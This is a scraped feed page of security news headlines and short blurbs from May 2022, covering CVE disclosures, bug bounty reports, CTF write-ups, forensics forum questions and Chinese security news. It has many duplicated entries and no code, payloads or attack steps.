    New tools that help developers write software also generate similar mistakes. Continue reading on Medium »
    How To Handle The Aftermath Of A Cyber Attack
    Once a breach or an attack happens, the company should try to resolve the  issue in 30 days or less. During that time, the team should… Continue reading on Medium »
    Passive/Active Information Gathering: Subdomain Enumeration
    This post is design to share some of the information I’ve learned while working through the Information Gathering- Web Edition module in… Continue reading on Medium »
    Xml External Entity Web Application Vulnerability : Mechanisms Part
    XML external entity attacks (XXEs) are fascinating vulnerabilities that target the XML parsers of an application. XXEs can be very… Continue reading on Medium »
    Azuro Launches a $30,000+ Bug Bounty on Immunefi
    Azuro has launched a bug bounty on web3’s leading bug bounty platform Immunefi, with hackers being rewarded a maximum bounty of $21,500… Continue reading on Medium »
  • Open

    War in Ukraine / May 11
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    My service for spying on Telegram users…
    Today I wanted to tell you about one of my developments — “Telegram Deanonymizer”. This development allows you to identify anonymous… Continue reading on Medium »
    The Moonshot Threat Bulletin — at a glance
    Moonshot’s Threat Bulletin is a new monthly insights service providing an overview of the key events, themes and narratives discussed by… Continue reading on Medium »
    Operation Galaxios Writeup
    Operation Galaxios is an Open Source Intelligence (OSINT) competition, set up by the team over at Hactoria. Each month they release a… Continue reading on Medium »
  • Open

    Web History Using Paladin
    Hello again... I have been using Sumuri Paladin for some time now and I think it is an excellent tool! I've been thinking about its application at scene/in the field and in particular using it to find web history on a target device. I've looked at all of the tools in the toolbox but as someone who is not the strongest with CLI tools I could do with a bit of help. Any advice or suggestions on how to get Web history within Paladin would be awesome thanks! 🙂 submitted by /u/dwaynehicks2179 [link] [comments]
    Bitlocker password request without Bitlocker
    Hello everyone,yesterday I made an EnCase file from a Windows 10 computer with Tableau TX1 (nvme SSD).If I mount it with FTK Image as Logical or Physical there's no problem, I can see everything. Everything it's fine also if I convert the EnCase file in vMware machine. If I try to indexing the EnCase file with Vound W4 (or with Autopsy), this one request me the Bitlocker password, but there isn't any Bitlocker inside Windows and the Microsoft disk cryptography isn't activated. Also, when I made the forensics copy with Tableau TX1, this one alerted me that the nvme SSD was encrypted with Bitlocker, but this is not true. ​ The question is: how is it possible? How can I recover the BitLocker recovery key after I turn on the vMware Machine? submitted by /u/Zipper_Ita [link] [comments]
    Axiom timeline question
    Having some problems for some reason with highlighting a few thousand files in timeline. Can shift and get a few hundred. Right click - export doesn't allow you to select all. Space bar highlights what you have. Any way to grab all of the several thousand files in the timeline? Thanks. submitted by /u/clarkwgriswoldjr [link] [comments]
  • Open

    Developers Day CTF Walkthrough
    Assalum Alikum, This is Rehan Mumtaz from NED university . It is my first writeup for CTF challenges walkthrough . Our team m4lware ended… Continue reading on Medium »
    Invoca Capture the Flag (CTF) 2022
    A perspective from a first-time CTF host, novice penetration tester, and Security professional Continue reading on Medium »
  • Open

    30 GB of horse xrays
    https://www.xrays.horse/examinations/ submitted by /u/Pelicaros [link] [comments]
    Thousands of cute pixel art gifs
    http://www.u.arizona.edu/~patricia/cute-collection/ submitted by /u/Pelicaros [link] [comments]
  • Open

    Zyxel Firewall Unauthenticated Command Inject (CVE-2022-30525)
    submitted by /u/chicksdigthelongrun [link] [comments]
    Hacking Electron Applications - 0x101
    submitted by /u/r0075h3ll [link] [comments]
    Content Security Policy for Dummies
    submitted by /u/r0075h3ll [link] [comments]
  • Open

    SecWiki News 2022-05-12 Review
    CVE-2021-31209 分析学习 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-12 Review
    CVE-2021-31209 分析学习 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    工控安全之如何黑掉这个世界
    来聊聊如何干掉工控设备
    FreeBuf早报 | 五眼国家发布新安全建议;西班牙情报部门主管因飞马丑闻被解雇
    因俄乌冲突引发网空对抗升级,美国政府对俄罗斯可能通过卡巴斯基软件入侵国内计算机的担忧加剧。
    国家药监局发布《药品监管网络安全与信息化建设“十四五”规划》
    《规划》提出,我国要实现从制药大国向制药强国的跨越式发展,这对于药品审评审批效率和药品安全风险管理能力提出了更高的要求。
    JAVA代码审计之数据类型与运算符(2)
    mian()方法是类体中的主方法。改方法从{开始到}结束。
    供应链网络安全潜在威胁及挑战
    俄乌冲突、英国脱欧、供应链不平衡等最近发生的不寻常事件,给全球供应链带来了前所未有的挑战。
    多个网安执法机构警告:越来越多的黑客正瞄准MSPs
    近日,五眼情报联盟成员对管理服务提供商(MSPs)及其客户发出了警告。
    惠普修复了影响200多种型号的固件BUG
    惠普近期发布了BIOS更新,修复了两个影响广泛PC和笔记本电脑产品的严重漏洞.
    新型隐形 Nerbian RAT 恶意软件横空出世
    网络研究员发现一个名为 Nerbian RAT 的新型恶意软件,它具有逃避研究人员检测和分析的能力。
    勒索软件REvil 回归,新版本正在积极开发中
    研究人员对新发现的样本进行分析,发现在短时间内已经出现多个修改过的新版本,表明 REvil 再次处于积极的开发过程中。
    Operation(龙)EviLoong:“无国界”黑客的电子派对
    本文内容也仅仅是对APT-Q-29组织在过去一段时间内攻击手法做一个分享,不讨论受害单位。
    恶意NPM软件包瞄准德国公司进行供应链攻击
    5月11日,网络安全研究人员在NPM注册表中发现了一些恶意软件包,专门针对一些位于德国的知名媒体、物流和工业公司进行供应链攻击。
    FreeBuf早报 | 欧盟指责俄攻击乌卫星网络;REvil勒索软件团伙沉寂半年后回归
    欧盟指责俄罗斯在2月24日攻击了Viasat运营的乌克兰KA-SAT卫星网络。这次网络攻击造成了乌克兰的通信中断,也影响了几个欧盟成员国。
  • Open

    Disambiguation: Privilege vs. Access vs. Permission
    New to infosec and I feel like these have discrete meaning but are used interchangeably. Any help in defining the vernacular understanding would be appreciated. So specifically, I'm looking for what you think most people think the definition is. ​ Access: an abstraction meaning permissions to access an object (file, image). ​ Privilege: Right granted to an agent [identity] (ie, a user or a nonpeople identity) to “do something,” like run a program. Sometimes, it’s used to define rights that are abnormal, special, or temporary. ​ Permission: a property specifically of an object (file) that delineates which agents are permitted to use the object and what they can do with it (read/modify etc). ​ So in contrast, access is about getting to objects, privilege is about running stuff, and permissions are the individual configs sitting on an object or agent that tell you what they can/cant do. Thanks for any help... submitted by /u/AreThoseNewSlacks [link] [comments]
  • Open

    Api endpoint- Revealed Transaction Details of about Millions of users
    No content preview
  • Open

    Api endpoint- Revealed Transaction Details of about Millions of users
    No content preview
  • Open

    Api endpoint- Revealed Transaction Details of about Millions of users
    No content preview

  • Open

    TCU Live: 2022MAY11 (latest release)
    The latest version of "TCU Live" (2022MAY11) has been released. It's running the latest Debian sid packages, Linux 5.17 kernel, and third party packages such as the Tor Browser, checkra1n, apfs-fuse, floss, etc. See the README in the link for more information: https://drive.google.com/drive/folders/0B8zx3qPcj9rJVjJrcnB4aXl1VG8?resourcekey=0-gjI_o4MHtiCvsjet9TCygw&usp=sharing It's built to be fairly lean and extensible and is great for in-house forensics, OSINT, field work, or if you just need to quickly spin up a Linux box. If you are looking for something that'll boot on almost all x86-64 (AMD64) hardware give it a shot and DM me if you have any comments or issues. submitted by /u/atdt0 [link] [comments]
    FTK exif search
    Hi all I am trying to search for specific exif details. Apparently according to FTK 7.4 and beyond you can parse this data and create columns out of it. Well if you can, I can’t work it out at all. I’m after exif that I can clearly see in the exif properties of image files, but how do I search it? Eg: exif.image.imagedescription I’d be perfectly happy with that in a column and all the details in there. Just after some pointers on how I go about sorting the data. Thank you submitted by /u/Cerveza87 [link] [comments]
  • Open

    Ddosify – Simple Load Testing Tool
    submitted by /u/binaryfor [link] [comments]
    URL spoofing in Box, Google, and Zoom
    submitted by /u/rsobers [link] [comments]
  • Open

    Go 1.18 Stabilizes Generics, Fuzzing, Multi-Module Support,Improves Performance
    Article URL: https://www.infoq.com/news/2022/03/go-1-18-stable/ Comments URL: https://news.ycombinator.com/item?id=31346891 Points: 5 # Comments: 0
    Earn $200K by fuzzing for a weekend: Part 1
    Article URL: https://secret.club/2022/05/11/fuzzing-solana.html Comments URL: https://news.ycombinator.com/item?id=31346190 Points: 43 # Comments: 3
  • Open

    How encrypted is the reddit mobile app?
    I am using the reddit mobile app on android. What can my Internet provider or the owner of the WLAN I am currently connected, see? 1. The subreddits I am visiting? 2. The subreddits I am following? 3. The posts I am up/down voting and saving? 4. The posts I am making myself (like this one)? I don't know much when it's comes to networking and the technology behind it so please explain so that even a none professional like me understands this. Thank you! submitted by /u/gentleXenomorph [link] [comments]
    McAfee Endpoint Security Policies
    Hi there. Are there people here who work with McAfee ENS TP/ATP? I don't really see a workflow on how to tune ENS policies: whitelist of noise events or understand where I can turn on "Block" status of policy. I have a lot of in "Report Only" status, but this is very insecure. And it hard to understand context of events, because there can be up to 150K events per days. Basically, I'm worried about putting Block, because there can be impact for bussiness. Perhaps someone knows some resources where I can read best-practise? For example, a list of programs that can be whitelist, or which policies can be (or highly recommended to put in the status Block). submitted by /u/athanielx [link] [comments]
    Where can I post my services?
    I have been trying to get a job as security analyst, but all they require a secret clearance. Where can i post my services as Cyber Security Analyst? Basic contracts like Incident handling and forensics. submitted by /u/theRunAroundGroup [link] [comments]
    Personal favorite VPN
    Iv been shopping around an looking for a new VPN provider, curious which ones you all like an why? submitted by /u/Durza44 [link] [comments]
    Best intro cert or training?
    I'm a 15 year professional with 5-years of IT experience directly in project and program management. I'm about to take on a program role in cyber security for my company and was hoping to get feedback on crash course training or entry level certs I should be looking at to familiarize myself with the technical side. I currently hold certs with PMI and SAFe... Any recommendations or general tips? submitted by /u/aryding [link] [comments]
  • Open

    A Detailed Guide on Rubeus
    Introduction Rubeus is a C# toolkit for Kerberos interaction and abuses. Kerberos, as we all know, is a ticket-based network authentication protocol and is used The post A Detailed Guide on Rubeus appeared first on Hacking Articles.
    A Detailed Guide on Rubeus
    Introduction Rubeus is a C# toolkit for Kerberos interaction and abuses. Kerberos, as we all know, is a ticket-based network authentication protocol and is used The post A Detailed Guide on Rubeus appeared first on Hacking Articles.
  • Open

    Remote kernel heap overflow
    PlayStation disclosed a bug submitted by m00nbsd: https://hackerone.com/reports/1350653 - Bounty: $10000
    CVE-2022-30115: HSTS bypass via trailing dot
    curl disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1557449
    CVE-2022-27780: percent-encoded path separator in URL host
    curl disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1553841
    SQL injextion via vulnerable doctrine/dbal version
    Nextcloud disclosed a bug submitted by nickvergessen: https://hackerone.com/reports/1390331
    CVE-2022-27782: TLS and SSH connection too eager reuse
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1555796
    Account takeover via Google OneTap
    Priceline disclosed a bug submitted by badca7: https://hackerone.com/reports/671406 - Bounty: $1500
    CVE-2022-27779: cookie for trailing dot TLD
    curl disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1553301
    CVE-2022-27778: curl removes wrong file on error
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1553598
    Certificate authentication re-use on redirect
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1563061
  • Open

    120k Email Credential Leaks | Plain Passwords
    It’s been a while since my last article publish here in medium. but in this article that I'm going to share with you is related to a Email… Continue reading on Medium »
    War in Ukraine / May 10
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
  • Open

    TryHackMe - Red Team OPSEC
    Hello Everyone. In this blog let’s see how to solve Red Team OPSEC room in TryHackMe. Continue reading on Techiepedia »
    The MITRE ATT&CK Framework
    In this blogpost, I’ll try my best to give you a very basic idea of what MITRE ATT&CK framework is and why it is the need of the hour in… Continue reading on Medium »
  • Open

    DigitalOcean mitigated the AMD vulnerability CVE-2021-26339
    Article URL: https://www.digitalocean.com/blog/digitalocean-mitigated-the-amd-vulnerability-cve-2021-26339 Comments URL: https://news.ycombinator.com/item?id=31342031 Points: 1 # Comments: 0
  • Open

    DigitalOcean mitigated the AMD vulnerability CVE-2021-26339
    Article URL: https://www.digitalocean.com/blog/digitalocean-mitigated-the-amd-vulnerability-cve-2021-26339 Comments URL: https://news.ycombinator.com/item?id=31342031 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-05-11 Review
    元学习——让机器学习学会学习 by ourren 企业安全建设:资产管理面面观 by ourren 新型eBPF后门boopkit的原理分析与演示 by ourren F5 BIG-IP 未授权 RCE(CVE-2022-1388)分析 by ourren Commit Level Vulnerability Dataset by ourren 卫星互联网发展与信息安全趋势 by ourren 顶会论文的经验分享与心路历程:立志勇攀高峰 坚持追求卓越 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-11 Review
    元学习——让机器学习学会学习 by ourren 企业安全建设:资产管理面面观 by ourren 新型eBPF后门boopkit的原理分析与演示 by ourren F5 BIG-IP 未授权 RCE(CVE-2022-1388)分析 by ourren Commit Level Vulnerability Dataset by ourren 卫星互联网发展与信息安全趋势 by ourren 顶会论文的经验分享与心路历程:立志勇攀高峰 坚持追求卓越 by ourren 更多最新文章,请访问SecWiki
  • Open

    JAVA代码审计之数组的基本操作(3)
    数组是一种容器,可以存储基本类型、引用类型;数据存储的类型必须一致。
    创历史记录,英国网络安全中心向社会发送3300万条警报
    近日,英国国家网络安全中心发布了一份报告,为先前注册早期预警服务的组织机构发送了3300多万条警报。
    研究人员发现一种新的网络钓鱼即服务——Frappo
    Frappo以网络钓鱼即服务的形式,使网络犯罪分子生成以假乱真的网络钓鱼页面,这些页面主要针对网络银行、电子商务和在线服务等来窃取客户数据。
    微软修复了所有Windows版本中的新NTLM零日漏洞
    微软于近期解决了一个积极利用的Windows LSA零日漏洞
    俄罗斯胜利日期间,黑客在电视节目上发布反战信息
    俄罗斯胜利日期间,境内部分电视台遭受网络攻击,黑客成功获取权限后,发布反战信息。
    Happycorp:1 Vulnhub 靶机演练
    一台vulnhub靶机,包含靶机渗透测试全过程。介绍详细具体,适合学习练习。
  • Open

    【安全通报】2022年5月微软漏洞补丁日修复多个高危漏洞
    近日,微软发布 2022年5月 安全补丁,修复了针对 36 款微软产品的 75 个漏洞 ,特别的是其中包含了 3 个 "0day" 漏洞,涉及 Windows 和 Windows 组件、Visual St...
  • Open

    【安全通报】2022年5月微软漏洞补丁日修复多个高危漏洞
    近日,微软发布 2022年5月 安全补丁,修复了针对 36 款微软产品的 75 个漏洞 ,特别的是其中包含了 3 个 "0day" 漏洞,涉及 Windows 和 Windows 组件、Visual St...
  • Open

    11 Essential Tools for Java Developers
    No content preview
    PWN101 Walkthrough | TryHackMe
    No content preview
    Cryptography essential for H4CK3R and CTF player 0x1(encoding).
    No content preview
  • Open

    11 Essential Tools for Java Developers
    No content preview
    PWN101 Walkthrough | TryHackMe
    No content preview
    Cryptography essential for H4CK3R and CTF player 0x1(encoding).
    No content preview
  • Open

    11 Essential Tools for Java Developers
    No content preview
    PWN101 Walkthrough | TryHackMe
    No content preview
    Cryptography essential for H4CK3R and CTF player 0x1(encoding).
    No content preview
  • Open

    IDOR exposes monetization status of any page’s video in Creator Studio.
    During testing I’ve found that “variables=%7B%22id%22%3A%22videoID%22%7D” parameter is vulnerable to IDOR. Vulnerability occur when… Continue reading on Medium »
    Creator Studio’s api endpoint is vulnerable to IDOR, exposes “p40_earnings_usd”:$$$
    During my testing I tried to test all query by changing PageIDs. Moreover, one of the query is vulnerable to IDOR. It was query named… Continue reading on Medium »
    Click for it
    Click to find vulnerability Continue reading on Medium »
    Improper Handling of Undefined Parameters [CWE-236] — The Hacktivists
    Improper Handling of Undefined Parameters describes a case when an application uses an undefined parameter, field, or argument. Continue reading on Medium »
    Incorrect Default Permissions [CWE-276] — The Hacktivists
    Incorrect Default Permissions weakness describes a case where software sets insecure permissions to objects on a system. Continue reading on Medium »
    Cross-Site Scripting — XSS [CWE-79] — The Hacktivists
    Cross-Site scripting or XSS is a weakness that is caused by improper neutralization of input during web page generation. Continue reading on Medium »
    Wombat’s Bug Bounty Program with Immunefi — Earn up to $500,000!
    Wombat’s goal is to deliver you the best stableswap in existence. That wouldn’t be possible without making the safety of our users’ funds… Continue reading on Wombat Exchange »
  • Open

    卷入.NET WEB
    作者:知道创宇404实验室 Longofo 时间:2022年05月11日 不久前拿到一个使用.NET目标的任务,有段时间exchange连续出了n次洞,一直想系统学下.NET相关的东西,这次遇到了,趁热补一下。能找到入门.NET WEB的并不多或者真不适合入门,还有大部分已经有经验的大佬大多直接进入反序列化或者漏洞分析阶段,好在部门有个搞过.NET的大佬@HuanGMz带了一手,相对没有...
  • Open

    卷入.NET WEB
    作者:知道创宇404实验室 Longofo 时间:2022年05月11日 不久前拿到一个使用.NET目标的任务,有段时间exchange连续出了n次洞,一直想系统学下.NET相关的东西,这次遇到了,趁热补一下。能找到入门.NET WEB的并不多或者真不适合入门,还有大部分已经有经验的大佬大多直接进入反序列化或者漏洞分析阶段,好在部门有个搞过.NET的大佬@HuanGMz带了一手,相对没有...
  • Open

    compost
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Cross-Site Scripting — XSS [CWE-79] — The Hacktivists
    Cross-Site scripting or XSS is a weakness that is caused by improper neutralization of input during web page generation. Continue reading on Medium »

  • Open

    Advice regarding career oportunities living in S.A.
    Hello everyone! I'm fairly new to the community, but I'm glad to see questions gets taken seriously here. I'm a pentester, almost 4 years of experience performing web and mobile application pentesting, but mainly focused on internal infrastructure assesments (Active Directory pentest with multiple forests, Red Team excercises, pivoting and accessing segmented networks) along with experience in Incident Response and Threat Hunting projects (basic knowledge in ELK stack, Carbon Black Response, Darktrace and basic Crowdstrike, automating tasks with Powershell/Bash) along with the capability to coordinate activities with clients and present results to both technical and executive staff. I have a bachellors degree in System's engineering (that's how the career is called here for some reason,…
    Good questions to ask the Cybersecurity Analyst I I'll replace (as someone new to Cybersecurity field)
    I have the opportunity to land a Cybersecurity Analyst I position, but don't really have much if any knowledge on the position/field(they'll train). What questions should I ask when I get to have a casual talk with the team member (non-manager) who I'd be replacing? From the little knowledge I have so far, I think I would set my long-term security goals towards Cloud Security or DevSecOps. I have some interest in Cloud(company uses AWS and a some Azure), and have no issues with doing programming/scripting, but just don't want to focus on it. From what I gathered from the job description, I'll be doing vulnerability scanning, risk/security assessments of databases/apps/servers/desktops/network devices. Monitoring SIEM, help administer endpoint protection software, work on reports and planning, etc. My questions so far include: typical day look like? how's on-call? Tools used? Do you think this job prepared you well for future jobs in cybersecurity? Pretty much looking for questions to give me an idea of what to expect, and how this will impact the rest of my career. Thank you. submitted by /u/43t20a [link] [comments]
    .shd and .spl files
    Came across these files on a print server under (c\windows\ System32\spool\PRINTERS) Can you re-print these files or view these files through a software, to see what they were? I tried copying them to another machine and see if I can reprint them from the same directory I’m trying to make a case to the admins to remove these files if they pose a security/privacy issues. submitted by /u/Yahweh03-08 [link] [comments]
    Compliance Queries
    Hey, I know that there's a big focus on SaaS companies vulnerability regarding data security. If you have any questions regarding SOC 2 and ISO 27001 compliance. I would love to answer any questions below. I've been speaking to quite a few people within this domain and there seems to be a lot of confusion regarding the subject matter. I'm happy to answer any questions that you might have. *For context purposes, I work for a start up called Scytale AI which focuses on SOC 2 compliance (this is purely for context and credibility purposes, not for promotional purposes). submitted by /u/Thecomplianceexpert [link] [comments]
    Completed my GCIH today!
    I'm very excited as this was my first SANS certification. So, curious to know, what should I do next? I'm planning on doing the Pentest+ because I received a free voucher but, SANS has so many options. I'm currently 5 years into my security career. I've done mostly SOC and SecOps work with some time in ProSevices and did the SE thing. It wasn't what I planned, exactly, but I've learned tons along the way. I'm completely open to suggestions. What else is out there, friends? submitted by /u/iam0r0r0 [link] [comments]
    Which password manager would work within a 1500ish employee company with office & Mobile workers (engineers) best?
    Hi, if hypothetically a password manager would be implemented within a business of this size and nature . Focusing on the strength of the passwords Being able to reset passwords/and or IT able to securely reset for users and handed over the password manager? As with mobile workers/engineers only have a tablet and don’t always remember their passwords set and need resetting often(how to automate it) What would it be and why? Also factoring in cost has the company may not be fully on board with shelling out too much If there’s anything I’ve missed, appreciate the questions I can answer Thanks :) submitted by /u/thelaw281 [link] [comments]
  • Open

    ETH Amsterdam — Hats hits the road
    Seven years ago, Amsterdam hosted one of the first ever international Ethereum conferences. Our OG CTO, Shay Zluf, was a keynote speaker… Continue reading on Medium »
    RCE via Dependency Confusion
    Hey there, I am Samrat Gupta aka Sm4rty, a Security Researcher and a Bug Bounty Hunter. In this Blog I will be sharing my recent finding… Continue reading on System Weakness »
    RCE via Dependency Confusion
    Hey there, I am Samrat Gupta aka Sm4rty, a Security Researcher and a Bug Bounty Hunter. In this Blog I will be sharing my recent finding… Continue reading on Medium »
    Business Logic Vulnerabilities (easy hit) Bug-Bounty
    Hello Cybersecurity Researchers, Continue reading on Medium »
    UniLend Finance moving towards Omnis Testnet with Completion of Bug Bounty
    UniLend Omnis, the upcoming new version for Lending and Borrowing of every ERC20 asset, sets another milestone and moves very close to… Continue reading on Medium »
    ResolveURI RXSS Imperva Waf Bypass
    Hi, Asslam-o-Alaikum Continue reading on Medium »
    Announcing the SynFutures V2 Testnet Bug Bounty Program
    We recently announced that our V2 testnet is now open and available for anyone to use and test! Continue reading on SynFutures »
  • Open

    Resources for important logs companies should be capturing?
    Newer to the field, and don't know much about what specific logs past the basics companies should be capturing. Logs coming form VPNs, Routers, Firewalls, Windows, etc. Logs related to AWS and Azure. Any thoughts? submitted by /u/haloman882 [link] [comments]
    Lateral movement diagrams
    How is your team displaying lateral movement for a report? Are you using Visio, Maltego, PowerPoint or something else? submitted by /u/purpleteamer24 [link] [comments]
    How do I view a file using a sleuth kit command?
    Hi everyone! Trying out sleuthkit for a school project and I'm stuck on one thing. There is questions where I am expected to for example "see the colour of an animal in a jpg file" or "tell what's spinning in a mp4 file". Tried to figure it out by myself but I have no clue anymore how to run and view a jpg or mp4 file. Could someone help me out? Thanks! submitted by /u/ahmedmourad22 [link] [comments]
    XWAYS File System image
    Hey guys, I hope everyone is well! It’s been a while. Does anyone have a a small image with XWFS/XWFS file system? Or possibly able to make one? I don’t have an xways license myself so cannot create a simple images with x ways proprietary file system. submitted by /u/SecrectSoc [link] [comments]
    Finding evidence of email tampering
    Hi folks, Sorry if this is not allowed, but I would appreciate any advice. Is there any way to determine if an outlook message has had attachments removed from it? I have a copy of the original .msg file that contains some attachments, but I need to determine if additional attachments were removed (with the remove attachments option, for example) before the file was sent to me. An examination of the header just shows: X-MS-Has-Attach: yes but doesn't indicate if any were removed, as far as I can tell. Is it possible to see in the header or other part of the file a list of the attachments, or at least the number of attachments? submitted by /u/mercsal [link] [comments]
  • Open

    Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923)
    submitted by /u/ly4k_ [link] [comments]
    Learning Linux kernel exploitation - Part 2 - CVE-2022-0847 (DirtyPipe)
    submitted by /u/0x00rick [link] [comments]
    Diving into Pre-Created computer accounts in Active Directory
    submitted by /u/oddvarmoe [link] [comments]
  • Open

    Threat Brief: CVE-2022-1388
    CVE-2022-1388 is a critical vulnerability that needs immediate attention. Learn what we've observed in the wild and strategies for mitigation. The post Threat Brief: CVE-2022-1388 appeared first on Unit42.
  • Open

    War in Ukraine / May 9
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    TryHackMe —  OhSINT Walkthrough
    Hello, we will be working on the TryHackMe box called “OhSINT”. This is labeled as an easy box and found this box to be useful, as well as… Continue reading on Medium »
    Is Google Spying on Our Gadgets? Now I’ll try to prove…
    Let’s take Russian e-mail to Yandex p12v@yandex.ru. Install it Yandex ID: 24585015. The easiest way to do this is through the bot… Continue reading on Medium »
    EZ Capture The Flag 2022 [Versi Indonesia]
    Write up yang hanya memuat penyelesaian challenge kategori OSINT pada EZ CTF 2022… Continue reading on Medium »
    Yandex Zen haters identification…
    How to identify a hater on the popular Russian site for bloggers Yandex Zen? Continue reading on Medium »
    EZ-CTF by CTF Cafe: OSINT challenges Solves and some lessons
    On May 06th the first CTF organized by CTF Cafe was held with 1,700 registered participants. Our team, the SpaceCows made 72th out of 848… Continue reading on Medium »
  • Open

    Common C Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Common C Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    Common C Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    SecWiki News 2022-05-10 Review
    MYSQL8.0特性—无select注入 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-10 Review
    MYSQL8.0特性—无select注入 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    Introducing pyCobaltHound
    pyCobaltHound is an Aggressor script extension for Cobalt Strike which aims to provide a deep integration between Cobalt Strike and Bloodhound. https://blog.nviso.eu/2022/05/09/introducing-pycobalthound/ submitted by /u/A32AN [link] [comments]
    Diving into pre-created computer accounts
    submitted by /u/oddvarmoe [link] [comments]
  • Open

    Diving into pre-created computer accounts
    I was on an engagement where I simply could not elevate privileges, so I had to become creative and look deep into my old bucket (bucket being my head) of knowledge, and this resulted in some fun stuff. I had found that the client had a vulnerable certificate template also known as ESC1 that allowed... The post Diving into pre-created computer accounts appeared first on TrustedSec.
  • Open

    FreeBuf早报 | 俄阅兵日被黑客播放反战视频;黑客在微软事件日志中隐藏恶意软件
    就在俄罗斯阅兵时,电视节目表系统遭到黑客入侵,并将阅兵节目替换成反战信息,此次黑客攻击影响了几个主要的网络电视。
    F5 BIG-IP产品中关键RCE漏洞利用程序被开发
    全球网安公司Positive Technologies已经针对F5 BIG-IP产品中的CVE-2022-1388漏洞开发了利用代码。
    无线电安全攻防之GPS定位劫持
    无线电安全攻防之GPS定位劫持。
    老赵说安全系列:爬取UNICOM FocalPoint数据以及对安全编程的反思
    FocalPoint能够根据市场需求和业务目标进行产品和产品组合管理。
    小佑科技:五重风险困扰云原生安全 | 网安新势力SOLO发布季
    云原生安全的风险管理、安全架构设计的方向在哪?让小佑技术总监告诉你!
    被Conti攻击后,哥斯达黎加宣布进入紧急状态
    在多个政府机构遭到Conti勒索组织的网络攻击后,哥斯达黎加总统Rodrigo Chaves宣布全国进入紧急状态。
    CERT-UA警告恶意垃圾邮件传播Jester信息窃取程序
    乌克兰计算机应急响应小组(CERT-UA)检测到某恶意垃圾邮件活动。
    “透明部落”利用走私情报相关诱饵针对印度的攻击活动分析
    Transparent Tribe最早追溯到2012年,一直以来,这个APT组织都在对印度军方和政府人员进行持续攻击。
  • Open

    NPM Vulnerability Discussion on Twitter
    Article URL: https://www.solipsys.co.uk/Chartter/1523831884786151424.svg Comments URL: https://news.ycombinator.com/item?id=31325154 Points: 131 # Comments: 185
  • Open

    Misconfigured Rate Limit in Sending Notifications to the Victims Phone Via the Endpoint " /faxes/inbox "
    Alohi disclosed a bug submitted by shamim_12__: https://hackerone.com/reports/1482919
  • Open

    F5 BIG-IP 未授权 RCE(CVE-2022-1388)分析
    作者:知道创宇404实验室 kuipla、Billion 时间:2022年05月10日 2022/5/4日F5官方发布一个关于BIG-IP的未授权RCE(CVE-2022-1388)安全公告,官方对该漏洞的描述是Undisclosed requests may bypass iControl REST authentication.,修复方式中提到了低版本可以将非Connection:k...
    Protected Process Light (PPL) Attack
    作者:李木 原文链接:https://mp.weixin.qq.com/s/Vp0UmGuGl_O2L4blUiHhSw PP/PPL(s)背景概念 首先,PPL表示Protected Process Light,但在此之前,只有Protected Processes。受保护进程的概念是随Windows Vista / Server 2008引入的,其目的不是保护您的数据或凭据。其最初目标是...
  • Open

    F5 BIG-IP 未授权 RCE(CVE-2022-1388)分析
    作者:知道创宇404实验室 kuipla、Billion 时间:2022年05月10日 2022/5/4日F5官方发布一个关于BIG-IP的未授权RCE(CVE-2022-1388)安全公告,官方对该漏洞的描述是Undisclosed requests may bypass iControl REST authentication.,修复方式中提到了低版本可以将非Connection:k...
    Protected Process Light (PPL) Attack
    作者:李木 原文链接:https://mp.weixin.qq.com/s/Vp0UmGuGl_O2L4blUiHhSw PP/PPL(s)背景概念 首先,PPL表示Protected Process Light,但在此之前,只有Protected Processes。受保护进程的概念是随Windows Vista / Server 2008引入的,其目的不是保护您的数据或凭据。其最初目标是...
  • Open

    ResolveURI RXSS Imperva Waf Bypass
    Hi, Asslam-o-Alaikum Continue reading on System Weakness »
    ResolveURI RXSS Imperva Waf Bypass
    Hi, Asslam-o-Alaikum Continue reading on Medium »
  • Open

    Ossuaries and Catacombs
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    pictures of grease
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Any directories with First 48 episodes?
    submitted by /u/kevinc2c1 [link] [comments]
  • Open

    Start an analysis by looking for the Robots.txt
    In order for search engines such as Google, Bing, DuckDuckGo to present their results of search terms, It´s necessary that information… Continue reading on Medium »

  • Open

    Grizzly.fi Token Forcible Minting
    In early April, our whitehats izhuer and Gwinhen from Pwned No More (PNM) reported a critical bug to the bug bounty program of Grizzly.fi. Continue reading on Medium »
    Why you should never trust any website
    Hello Everyone. Today I have an interesting story about a target that I have done some pentesting on. The result will shock you Continue reading on Medium »
    The Basics of Subdomain Takeovers
    A subdomain takeover is a vulnerability which allows an attacker to take the control of a subdomain which is not owned by that attacker. Continue reading on Medium »
    Bug Bounty Career: Web Hacking
    Details Continue reading on Medium »
    The Linuxless recon for bug bounty beginners who can’t code
    When i started doing bug bounties almost 2 years ago i saw this legendary video by tomnomnom and STÖK and thought it was sheer magic. Two… Continue reading on Medium »
    AppSec Tales VI | 2FA
    Application Security Testing of the 2FA form guidelines. Continue reading on System Weakness »
  • Open

    Global default settings page is accessible to non-administrators
    Phabricator disclosed a bug submitted by dyls: https://hackerone.com/reports/1563139 - Bounty: $300
    Slowvote and Countdown can cause Denial of Service due to recursive inclusion
    Phabricator disclosed a bug submitted by dyls: https://hackerone.com/reports/1563142
  • Open

    San Diego CTF 2022 — Part Of The Ship…
